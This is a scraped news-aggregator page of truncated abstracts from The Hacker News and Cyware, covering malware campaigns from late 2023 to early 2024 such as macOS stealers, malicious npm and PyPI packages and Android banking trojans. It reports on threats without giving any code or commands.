Cracked software have been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data. Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and Apple silicon processor architectures. The attack chains leverage booby-trapped disk image (DMG) files that include a program named "Activator" and a pirated version of legitimate software such as xScope. Users who end up opening the DMG files are urged to move both files to the Applications folder and run the Activator component to apply a supposed patch and run the xScope app. Launching Activator, however, displays a prompt asking the victim to enter the system administrator password, thereby allowing it to execute a Mach-O binary with elevated permissions in order to launch the modifThe Hacker News
January 19, 2024
Experts Warn of macOS Backdoor Hidden in Pirated Versions of Popular Software Full Text
Abstract
Pirated applications targeting Apple macOS users have been observed containing a backdoor capable of granting attackers remote control to infected machines. "These applications are being hosted on Chinese pirating websites in order to gain victims," Jamf Threat Labs researchers Ferdous Saljooki and Jaron Bradley said . "Once detonated, the malware will download and execute multiple payloads in the background in order to secretly compromise the victim's machine." The backdoored disk image (DMG) files, which have been modified to establish communications with actor-controlled infrastructure, include legitimate software like Navicat Premium, UltraEdit, FinalShell, SecureCRT, and Microsoft Remote Desktop. The unsigned applications, besides being hosted on a Chinese website named macyy[.]cn, incorporate a dropper component called "dylib" that's executed every time the application is opened. The dropper then acts as a conduit to fetch a backdoorThe Hacker News
January 19, 2024
Npm Trojan Bypasses UAC, Installs AnyDesk with “Oscompatible” Package Full Text
Abstract
A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines. The package, named " oscompatible ," was published on January 9, 2024, attracting a total of 380 downloads before it was taken down. oscompatible included a "few strange binaries," according to software supply chain security firm Phylum, including a single executable file, a dynamic-link library (DLL) and an encrypted DAT file, alongside a JavaScript file. This JavaScript file ("index.js") executes an "autorun.bat" batch script but only after running a compatibility check to determine if the target machine runs on Microsoft Windows. If the platform is not Windows, it displays an error message to the user, stating the script is running on Linux or an unrecognized operating system, urging them to run it on "Windows Server OS." The batch script, for its part, verifies if it has admin privilThe Hacker News
January 18, 2024
New Docker Malware Steals CPU for Crypto & Drives Fake Website Traffic Full Text
Abstract
Vulnerable Docker services are being targeted by a novel campaign in which the threat actors are deploying XMRig cryptocurrency miner as well as the 9Hits Viewer software as part of a multi-pronged monetization strategy. "This is the first documented case of malware deploying the 9Hits application as a payload," cloud security firm Cado said , adding the development is a sign that adversaries are always on the lookout for diversifying their strategies to make money off compromised hosts. 9Hits advertises itself as a "unique web traffic solution" and an "automatic traffic exchange" that allows members of the service to drive traffic to their sites in exchange for purchasing credits. This is accomplished by means of a software called 9Hits Viewer, which runs a headless Chrome browser instance to visit websites requested by other members, for which they earn credits to pay for generating traffic to their sites. The exact method used to spread the malwaThe Hacker News
January 18, 2024
Malware Exploiting 9Hits, Turns Docker Servers into Crypto Miners Full Text
Abstract
Attackers are using off-the-shelf images from Dockerhub to spread malware, with the 9Hits app visiting various websites and the XMRig miner disabled from visiting crypto-related sites to prevent analysis.Cyware
January 16, 2024
Remcos RAT Spreading Through Adult Games in New Attack Wave Full Text
Abstract
The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea. WebHard, short for web hard drive , is a popular online file storage system used to upload, download, and share files in the country. While webhards have been used in the past to deliver njRAT , UDP RAT, and DDoS botnet malware , the AhnLab Security Emergency Response Center's (ASEC) latest analysis shows that the technique has been adopted to distribute Remcos RAT. In these attacks, users are tricked into opening booby-trapped files by passing them off as adult games, which, when launched, execute malicious Visual Basic scripts in order to run an intermediate binary named "ffmpeg.exe." This results in the retrieval of Remcos RAT from an actor-controlled server. A sophisticated RAT, Remcos (aka Remote Control and Surveillance) facilitates unauthorized remote control and surveillance of compromised hosts, enablinThe Hacker News
January 15, 2024
Azorult Malware Comes to the Fore in New Dark Web Campaign Full Text
Abstract
The Azorult malware, known for stealing sensitive data, has resurfaced with a sophisticated approach. It is distributed through malicious PDF files that contain a shortcut file.Cyware
January 15, 2024
Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability Full Text
Abstract
Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector . First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams. Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation , which is said to have been active since 2017 and infiltrated no less than 1 million sites since then. The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites . These attacks take advantage of a high-severity flaw in Popup Builder ( CVE-2023-6000 , CVSS score: 8.8) – a plugin with more than 200,000 active installs – that wasThe Hacker News
January 11, 2024
New Python-based FBot Hacking Toolkit Aims at Cloud and SaaS Platforms Full Text
Abstract
A new Python-based hacking tool called FBot has been uncovered targeting web servers, cloud services, content management systems (CMS), and SaaS platforms such as Amazon Web Services (AWS), Microsoft 365, PayPal, Sendgrid, and Twilio. "Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. FBot is the latest addition to the list of cloud hacking tools like AlienFox, GreenBot (aka Maintance), Legion , and Predator , the latter four of which share code-level overlaps with AndroxGh0st. SentinelOne described FBot as "related but distinct from these families," owing to the fact that it does not reference any source code from AndroxGh0st, although it exhibits similarities with Legion, which first came to light last year. The end goal of the tool is to hijack cloud, SaaS, andThe Hacker News
January 11, 2024
Atomic Stealer Gets an Upgrade - Targeting Mac Users with Encrypted Payload Full Text
Abstract
Cybersecurity researchers have identified an updated version of a macOS information stealer called Atomic (or AMOS), indicating that the threat actors behind the malware are actively enhancing its capabilities. "It looks like Atomic Stealer was updated around mid to late December 2023, where its developers introduced payload encryption in an effort to bypass detection rules," Malwarebytes' Jérôme Segura said in a Wednesday report. Atomic Stealer first emerged in April 2023 for a monthly subscription of $1,000. It's capable of harvesting sensitive information from a compromised host, including Keychain passwords, session cookies, files, crypto wallets, system metadata, and the machine's password via a fake prompt. Over the past several months, the malware has been observed propagated via malvertising and compromised sites under the guise of legitimate software and web browser updates. Malwarebytes' latest analysis shows that Atomic Stealer is noThe Hacker News
January 05, 2024
SpectralBlur: New macOS Backdoor Threat from North Korean Hackers Full Text
Abstract
Cybersecurity researchers have discovered a new Apple macOS backdoor called SpectralBlur that overlaps with a known malware family that has been attributed to North Korean threat actors. "SpectralBlur is a moderately capable backdoor that can upload/download files, run a shell, update its configuration, delete files, hibernate, or sleep, based on commands issued from the [command-and-control server]," security researcher Greg Lesnewich said . The malware shares similarities with KANDYKORN (aka SockRacket), an advanced implant that functions as a remote access trojan capable of taking control of a compromised host. It's worth noting that the KANDYKORN activity also intersects with another campaign orchestrated by the Lazarus sub-group known as BlueNoroff (aka TA444) which culminates in the deployment of a backdoor referred to as RustBucket and a late-stage payload dubbed ObjCShellz . In recent months, the threat actor has been observed combining disparate pieces of tThe Hacker News
January 04, 2024
Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners Full Text
Abstract
Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. "These packages, upon initial use, deploy a CoinMiner executable on Linux devices," Fortinet FortiGuard Labs researcher Gabby Xiong said , adding the campaign shares overlaps with a prior campaign that involved the use of a package called culturestreak to deploy a crypto miner. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab . The ELF binary file is then executed in the background using the nohup command , thus ensuring that the process continThe Hacker News
January 03, 2024
Malware Using Google MultiLogin Exploit to Maintain Access Despite Password Reset Full Text
Abstract
Information stealing malware are actively taking advantage of an undocumented Google OAuth endpoint named MultiLogin to hijack user sessions and allow continuous access to Google services even after a password reset. According to CloudSEK, the critical exploit facilitates session persistence and cookie generation, enabling threat actors to maintain access to a valid session in an unauthorized manner. The technique was first revealed by a threat actor named PRISMA on October 20, 2023, on their Telegram channel. It has since been incorporated into various malware-as-a-service (MaaS) stealer families , such as Lumma, Rhadamanthys, Stealc, Meduza, RisePro, and WhiteSnake. The MultiLogin authentication endpoint is primarily designed for synchronizing Google accounts across services when users sign in to their accounts in the Chrome web browser (i.e., profiles ). A reverse engineering of the Lumma Stealer code has revealed that the technique targets the "Chrome's token_The Hacker News
January 01, 2024
New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections Full Text
Abstract
Security researchers have detailed a new variant of a dynamic link library ( DLL ) search order hijacking technique that could be used by threat actors to bypass security mechanisms and achieve execution of malicious code on systems running Microsoft Windows 10 and Windows 11. The approach "leverages executables commonly found in the trusted WinSxS folder and exploits them via the classic DLL search order hijacking technique," cybersecurity firm Security Joes said in a new report exclusively shared with The Hacker News. In doing so, it allows adversaries to eliminate the need for elevated privileges when attempting to run nefarious code on a compromised machine as well as introduce potentially vulnerable binaries into the attack chain, as observed in the past . DLL search order hijacking , as the name implies, involves gaming the search order used to load DLLs in order to execute malicious payloads for purposes of defense evasion, persistence, and privilege escalThe Hacker News
January 01, 2024
New JinxLoader Targeting Users with Formbook and XLoader Malware Full Text
Abstract
A new Go-based malware loader called JinxLoader is being used by threat actors to deliver next-stage payloads such as Formbook and its successor XLoader . The disclosure comes from cybersecurity firms Palo Alto Networks Unit 42 and Symantec, both of which highlighted multi-step attack sequences that led to the deployment of JinxLoader through phishing attacks. "The malware pays homage to League of Legends character Jinx , featuring the character on its ad poster and [command-and-control] login panel," Symantec said . "JinxLoader's primary function is straightforward – loading malware." Unit 42 revealed in late November 2023 that the malware service was first advertised on hackforums[.]net on April 30, 2023, for $60 a month, $120 a year, or for a lifetime fee of $200. The attacks begin with phishing emails impersonating Abu Dhabi National Oil Company (ADNOC), urging recipients to open password-protected RAR archive attachments that, upon opening,The Hacker News
December 30, 2023
Info-Stealing Malware Now Includes Google Session Hijacking Full Text
Abstract
Multiple malware-as-a-service info stealers now have the ability to manipulate authentication tokens to gain persistent access to a victim's Google account, even after the user has reset their password.Cyware
December 28, 2023
Four-Year Campaign Backdoored Iphones Using Undocumented Hardware Function Full Text
Abstract
The secret hardware function targeted by the attackers allowed them to bypass advanced memory protections, enabling post-exploitation techniques and compromising system integrity.Cyware
December 28, 2023
New Rugmi Malware Loader Surges with Hundreds of Daily Detections Full Text
Abstract
A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms . Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi . "This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023. Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single digit daily numbers to hundreds per day. Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expenThe Hacker News
December 27, 2023
New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices Full Text
Abstract
A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices. Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives. It's also capable of gathering metadata about the compromised device and contacting a command-and-control (C2) server to fetch a second-stage payload, but only after determining if it fits the bill. The second stage is "dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps, among other actions financially motivated without user consent," security researcher Fernando Ruiz said . The cybersecurity firm said it identified 25 apps that come with this active thrThe Hacker News
December 26, 2023
Carbanak Banking Malware Resurfaces with New Ransomware Tactics Full Text
Abstract
The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new distribution chains and has been distributed through compromised websites to impersonate various business-related software." Some of the impersonated tools include popular business-related software such as HubSpot, Veeam, and Xero. Carbanak , detected in the wild since at least 2014, is known for its data exfiltration and remote control features. Starting off as a banking malware, it has been put to use by the FIN7 cybercrime syndicate . In the latest attack chain documented by NCC Group, the compromised websites are designed to host malicious installer files masquerading as legitimate utilities toThe Hacker News
December 26, 2023
Stealth Android Backdoor Xamalicious Found Actively Infecting Devices Full Text
Abstract
The Xamalicious backdoor, implemented with Xamarin, targets Android devices by gaining accessibility privileges and communicating with a C2 server to download a second-stage payload, potentially enabling fraudulent actions without user consent.Cyware
December 26, 2023
Nim-based Malware Distributed Using Microsoft Word Docs Impersonating the Nepali Government Full Text
Abstract
The Nim-based backdoor communicates with command and control servers, evades analysis tools, and establishes persistence on the compromised machine through startup folders and scheduled tasks.Cyware
December 23, 2023
Bandook - A Persistent Threat That Keeps Evolving Full Text
Abstract
Bandook malware, a remote access trojan, has evolved with a new variant that uses a PDF file to distribute its payload and injects it into msinfo32.exe, allowing remote attackers to gain control of infected systems.Cyware
December 22, 2023
Rogue WordPress Plugin Exposes E-Commerce Sites to Credit Card Theft Full Text
Abstract
Threat hunters have discovered a rogue WordPress plugin that's capable of creating bogus administrator users and injecting malicious JavaScript code to steal credit card information. The skimming activity is part of a Magecart campaign targeting e-commerce websites, according to Sucuri. "As with many other malicious or fake WordPress plugins it contains some deceptive information at the top of the file to give it a veneer of legitimacy," security researcher Ben Martin said . "In this case, comments claim the code to be 'WordPress Cache Addons.'" Malicious plugins typically find their way to WordPress sites via either a compromised admin user or the exploitation of security flaws in another plugin already installed on the site. Post installation, the plugin replicates itself to the mu-plugins (or must-use plugins) directory so that it's automatically enabled and conceals its presence from the admin panel. "Since the only way to reThe Hacker News
December 22, 2023
Operation RusticWeb: Rust-Based Malware Targets Indian Government Entities Full Text
Abstract
Indian government entities and the defense sector have been targeted by a phishing campaign that's engineered to drop Rust-based malware for intelligence gathering. The activity, first detected in October 2023, has been codenamed Operation RusticWeb by enterprise security firm SEQRITE. "New Rust-based payloads and encrypted PowerShell commands have been utilized to exfiltrate confidential documents to a web-based service engine, instead of a dedicated command-and-control (C2) server," security researcher Sathwik Ram Prakki said . Tactical overlaps have been uncovered between the cluster and those widely tracked under the monikers Transparent Tribe and SideCopy, both of which are assessed to be linked to Pakistan. SideCopy is also a suspected subordinate element within Transparent Tribe. Last month, SEQRITE detailed multiple campaigns undertaken by the threat actor targeting Indian government bodies to deliver numerous trojans such as AllaKore RAT, Ares RAT, anThe Hacker News
December 21, 2023
Chameleon Android Banking Trojan Variant Bypasses Biometric Authentication Full Text
Abstract
Cybersecurity researchers have discovered an updated version of an Android banking malware called Chameleon that has expanded its targeting to include users in the U.K. and Italy. "Representing a restructured and enhanced iteration of its predecessor, this evolved Chameleon variant excels in executing Device Takeover (DTO) using the accessibility service, all while expanding its targeted region," Dutch mobile security firm ThreatFabric said in a report shared with The Hacker News. Chameleon was previously documented by Cyble in April 2023, noting that it had been used to single out users in Australia and Poland since at least January. Like other banking malware, it's known to abuse its permissions to Android's accessibility service to harvest sensitive data and conduct overlay attacks. The rogue apps containing the earlier version were hosted on phishing pages and found to impersonate genuine institutions in the countries, such as the Australian Taxation OfficThe Hacker News
December 21, 2023
New JavaScript Malware Targeted 50,000+ Users at Dozens of Banks Worldwide Full Text
Abstract
A new piece of JavaScript malware has been observed attempting to steal users' online banking account credentials as part of a campaign that has targeted more than 40 financial institutions across the world. The activity cluster, which employs JavaScript web injections, is estimated to have led to at least 50,000 infected user sessions spanning North America, South America, Europe, and Japan. IBM Security Trusteer said it detected the campaign in March 2023. "Threat actors' intention with the web injection module is likely to compromise popular banking applications and, once the malware is installed, intercept the users' credentials in order to then access and likely monetize their banking information," security researcher Tal Langus said . Attack chains are characterized by the use of scripts loaded from the threat actor-controlled server ("jscdnpack[.]com"), specifically targeting a page structure that's common to several banks. It's suspThe Hacker News
December 20, 2023
New Go-Based JaskaGO Malware Targeting Windows and macOS Systems Full Text
Abstract
A new Go-based information stealer malware called JaskaGO has emerged as the latest cross-platform threat to infiltrate both Windows and Apple macOS systems. AT&T Alien Labs, which made the discovery, said the malware is "equipped with an extensive array of commands from its command-and-control (C&C) server." Artifacts designed for macOS were first observed in July 2023, impersonating installers for legitimate software such as CapCut. Other variants of the malware have masqueraded as AnyConnect and security tools. Upon installation, JaskaGO runs checks to determine if it is executing within a virtual machine (VM) environment, and if so, executes a harmless task like pinging Google or printing a random number in a likely effort to fly under the radar. In other scenarios, JaskaGO proceeds to harvest information from the victim system and establishes a connection to its C&C for receiving further instructions, including executing shell commands, enumeratingThe Hacker News
December 18, 2023
Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges Full Text
Abstract
The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable. This approach not only transforms it into a threat capable of delivering "specific distributor needs," but also makes it more potent, Check Point said in a technical deepdive published last week. Rhadamanthys, first documented by ThreatMon in October 2022, has been sold under the malware-as-a-service (MaaS) model as early as September 2022 by an actor under the alias "kingcrete2022." Typically distributed through malicious websites mirroring those of genuine software that are advertised through Google ads, the malware is capable of harvesting a wide range of sensitive information from compromised hosts, including from web browsers, crypto wallets, email clients, VPN, and instant messaging apps. "Rhadamanthys represents a sThe Hacker News
December 18, 2023
QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry Full Text
Abstract
A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network. Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry. "Targets received a PDF from a user masquerading as an IRS employee," the tech giant said in a series of posts shared on X (formerly Twitter). "The PDF contained a URL that downloads a digitally signed Windows Installer (.msi). Executing the MSI led to Qakbot being invoked using export 'hvsi' execution of an embedded DLL." Microsoft said that the payload was generated the same day the campaign started and that it's configured with the previously unseen version 0x500. Zscaler ThreatLabz, in a post shared on X, described the resurfaced QakBot as a 64-bit binary that utilizes AESThe Hacker News
December 15, 2023
New NKAbuse Malware Exploits NKN Blockchain Tech for DDoS Attacks Full Text
Abstract
A novel multi-platform threat called NKAbuse has been discovered using a decentralized, peer-to-peer network connectivity protocol known as NKN (short for New Kind of Network) as a communications channel. "The malware utilizes NKN technology for data exchange between peers, functioning as a potent implant, and equipped with both flooder and backdoor capabilities," Russian cybersecurity company Kaspersky said in a Thursday report. NKN, which has over 62,000 nodes, is described as a "software overlay network built on top of today's Internet that enables users to share unused bandwidth and earn token rewards." It incorporates a blockchain layer on top of the existing TCP/IP stack. While threat actors are known to take advantage of emerging communication protocols for command-and-control (C2) purposes and evade detection, NKAbuse leverages blockchain technology to conduct distributed denial-of-service (DDoS) attacks and function as an implant inside comThe Hacker News
December 14, 2023
116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems Full Text
Abstract
Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor. "In some cases, the final payload is a variant of the infamous W4SP Stealer , or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.Léveillé and Rene Holt said in a report published earlier this week. The packages are estimated to have been downloaded over 10,000 times since May 2023. The threat actors behind the activity have been observed using three techniques to bundle malicious code into Python packages, namely via a test.py script, embedding PowerShell in setup.py file, and incorporating it in obfuscated form in the __init__.py file . Irrespective of the method used, the end goal of the campaign is to compromise the targeted host with malware, primarily a backdoor capable of remote command execution, data exfiltration, anThe Hacker News
December 14, 2023
New Pierogi++ Malware by Gaza Cyber Gang Targeting Palestinian Entities Full Text
Abstract
A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi. The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor. "Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News. Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access. Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStThe Hacker News
December 13, 2023
Cluster of Malicious Python Packages in PyPI Discovered Distributing Malware Full Text
Abstract
ESET Research has discovered a cluster of malicious Python packages in PyPI, the official Python package repository. These packages target both Windows and Linux systems and deliver a custom backdoor.Cyware
December 11, 2023
GULOADER Adds New Anti-Analysis Tactic to Arsenal Full Text
Abstract
Researchers have identified new techniques employed by the GuLoader malware to enhance its evasion capabilities and make analysis more challenging. The highly evasive shellcode downloader malware was found leveraging Vectored Exception Handler (VEH) capability. Organizations can leverage the late ... Read MoreCyware
December 11, 2023
SpyLoan Scandal: 18 Malicious Loan Apps Defraud Millions of Android Users Full Text
Abstract
Cybersecurity researchers have discovered 18 malicious loan apps for Android on the Google Play Store that have been collectively downloaded over 12 million times. "Despite their attractive appearance, these services are in fact designed to defraud users by offering them high-interest-rate loans endorsed with deceitful descriptions, all while collecting their victims' personal and financial information to blackmail them, and in the end gain their funds," ESET said . The Slovak cybersecurity company is tracking these apps under the name SpyLoan , noting they are designed to target potential borrowers located in Southeast Asia, Africa, and Latin America. The list of apps, which have now been taken down by Google, is below - AA Kredit: इंस्टेंट लोन ऐप (com.aa.kredit.android) Amor Cash: Préstamos Sin Buró (com.amorcash.credito.prestamo) Oro Préstamo - Efectivo rápido (com.app.lo.go) Cashwow (com.cashwow.cow.eg) CrediBus Préstamos de crédito (com.dinero.profin.prThe Hacker News
December 11, 2023
New PoolParty Process Injection Techniques Outsmart Top EDR Solutions Full Text
Abstract
A new collection of eight process injection techniques, collectively dubbed PoolParty , could be exploited to achieve code execution in Windows systems while evading endpoint detection and response (EDR) systems. SafeBreach researcher Alon Leviev said the methods are "capable of working across all processes without any limitations, making them more flexible than existing process injection techniques." The findings were first presented at the Black Hat Europe 2023 conference last week. Process injection refers to an evasion technique used to run arbitrary code in a target process. A wide range of process injection techniques exists, such as dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging. PoolParty is so named because it's rooted in a component called Windows user-mode thread pool, leveraging it to insert any type of work item into a target process on the system. IThe Hacker News
December 9, 2023
Bypassing Major EDRs Using Pool Party Process Injection Techniques Full Text
Abstract
The technique utilizes Windows thread pools and includes a chain of three primitives for memory allocation, writing malicious code, and executing it, making it more flexible than existing process injection techniques.Cyware
December 09, 2023
Researchers Unveal GuLoader Malware’s Latest Anti-Analysis Techniques Full Text
Abstract
Threat hunters have unmasked the latest tricks adopted by a malware strain called GuLoader in an effort to make analysis more challenging. "While GuLoader's core functionality hasn't changed drastically over the past few years, these constant updates in their obfuscation techniques make analyzing GuLoader a time-consuming and resource-intensive process," Elastic Security Labs researcher Daniel Stepanic said in a report published this week. First spotted in late 2019, GuLoader (aka CloudEyE) is an advanced shellcode-based malware downloader that's used to distribute a wide range of payloads, such as information stealers, while incorporating a bevy of sophisticated anti-analysis techniques to dodge traditional security solutions. A steady stream of open-source reporting into the malware in recent months has revealed the threat actors behind it have continued to improve its ability to bypass existing or new security features alongside other implemented feThe Hacker News
December 08, 2023
Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software Full Text
Abstract
Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new Trojan-Proxy malware. "Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said . The Russian cybersecurity firm said it found evidence indicating that the malware is a cross-platform threat, owing to artifacts unearthed for Windows and Android that piggybacked on pirated tools. The macOS variants propagate under the guise of legitimate multimedia, image editing, data recovery, and productivity tools. This suggests that users searching for pirated software are the targets of the campaign. Unlike their genuine, unaltered counterparts, which are offered as disk image (.DMG) files, the rogue versions are deliveredThe Hacker News
December 8, 2023
New Variants of HeadCrab Malware Commandeer Thousands of Servers Full Text
Abstract
The HeadCrab malware has resurfaced with a new variant that allows root access to Redis servers, infecting over 1,100 servers and enabling the attacker to control and modify responses.Cyware
December 07, 2023
New Stealthy ‘Krasue’ Linux Trojan Targeting Telecom Firms in Thailand Full Text
Abstract
A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to main covert access to victim networks at lease since 2021. Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News. The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty. This has raised the possibility that Krasue is eitheThe Hacker News
December 6, 2023
SpyLoan Android Malware Targets Users in Southeast Asia, Africa, and Latin America Full Text
Abstract
These apps trick users into providing sensitive personal and financial information, which is then used to blackmail them. The apps focus on users in Southeast Asia, Africa, and Latin America.Cyware
December 4, 2023
New Variant of P2Pinfect Targets MIPS Devices Including Routers and IoT Devices Full Text
Abstract
The new variant includes updated evasion techniques, such as Virtual Machine detection, debugger detection, and anti-forensics measures on Linux hosts, making it more difficult for researchers to analyze.Cyware
December 01, 2023
New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia Full Text
Abstract
Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023. "Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app security firm Promon said in an analysis published Thursday. Propagated mainly via email, SMS, and messaging apps, attack chains trick recipients into downloading a purported banking app that comes fitted with legitimate features but also incorporates rogue components. Victims are then subjected to a social engineering technique akin to telephone-oriented attack delivery ( TOAD ), which involves calling a bogus call center to receive step-by-step instructions for running the app. A key characteristic of the malware that sets it apart from other banking trojans of its kind is the use ofThe Hacker News
November 29, 2023
200+ Malicious Android Apps Targeting Iranian Banks: Experts Warn Full Text
Abstract
An Android malware campaign targeting Iranian banks has expanded its capabilities and incorporated additional evasion tactics to fly under the radar. That's according to a new report from Zimperium, which discovered more than 200 malicious apps associated with the malicious operation, with the threat actor also observed carrying out phishing attacks against the targeted financial institutions. The campaign first came to light in late July 2023 when Sophos detailed a cluster of 40 credential-harvesting apps targeting customers of Bank Mellat, Bank Saderat, Resalat Bank, and Central Bank of Iran. The primary goal of the bogus apps is to trick victims into granting them extensive permissions as well as harvest banking login credentials and credit card details by abusing Android's accessibility services . "The corresponding legitimate versions of the malicious apps are available at Cafe Bazaar, an Iranian Android marketplace, and have millions of downloads," SophosThe Hacker News
November 29, 2023
Unveiling the Persisting Threat: Iranian Mobile Banking Malware Campaign Extends Its Reach Full Text
Abstract
The primary goal of the bogus apps is to trick victims into granting them extensive permissions as well as harvest banking login credentials and credit card details by abusing Android's accessibility services.Cyware
November 23, 2023
Alert: New WailingCrab Malware Loader Spreading via Shipping-Themed Emails Full Text
Abstract
Delivery- and shipping-themed email messages are being used to deliver a sophisticated malware loader known as WailingCrab . "The malware itself is split into multiple components, including a loader, injector, downloader and backdoor, and successful requests to C2-controlled servers are often necessary to retrieve the next stage," IBM X-Force researchers Charlotte Hammond, Ole Villadsen, and Kat Metrick said . WailingCrab, also called WikiLoader, was first documented by Proofpoint in August 2023, detailing campaigns targeting Italian organizations that used the malware to ultimately deploy the Ursnif (aka Gozi) trojan. It was spotted in the wild in late December 2022. The malware is the handiwork of a threat actor known as TA544, which is also tracked as Bamboo Spider and Zeus Panda. IBM X-Force has named the cluster Hive0133. Actively maintained by its operators, the malware has been observed incorporating features that prioritize stealth and allows it to resist anThe Hacker News
November 22, 2023
Exploit for Critical Windows Defender Bypass Goes Public Full Text
Abstract
A proof-of-concept exploit has been released for a critical zero-day vulnerability in Windows SmartScreen. The vulnerability, identified as CVE-2023-36025, allows attackers to bypass Windows Defender SmartScreen checks and execute malicious code.Cyware
November 21, 2023
New Agent Tesla Malware Variant Using ZPAQ Compression in Email Attacks Full Text
Abstract
A new variant of the Agent Tesla malware has been observed delivered via a lure file with the ZPAQ compression format to harvest data from several email clients and nearly 40 web browsers. "ZPAQ is a file compression format that offers a better compression ratio and journaling function compared to widely used formats like ZIP and RAR," G Data malware analyst Anna Lvova said in a Monday analysis. "That means that ZPAQ archives can be smaller, saving storage space and bandwidth when transferring files. However, ZPAQ has the biggest disadvantage: limited software support." First appearing in 2014, Agent Tesla is a keylogger and remote access trojan (RAT) written in .NET that's offered to other threat actors as part of a malware-as-a-service (MaaS) model. It's often used as a first-stage payload, providing remote access to a compromised system and utilized to download more sophisticated second-stage tools such as ransomware. Agent Tesla is typThe Hacker News
November 20, 2023
LummaC2 Malware Deploys New Trigonometry-Based Anti-Sandbox Technique Full Text
Abstract
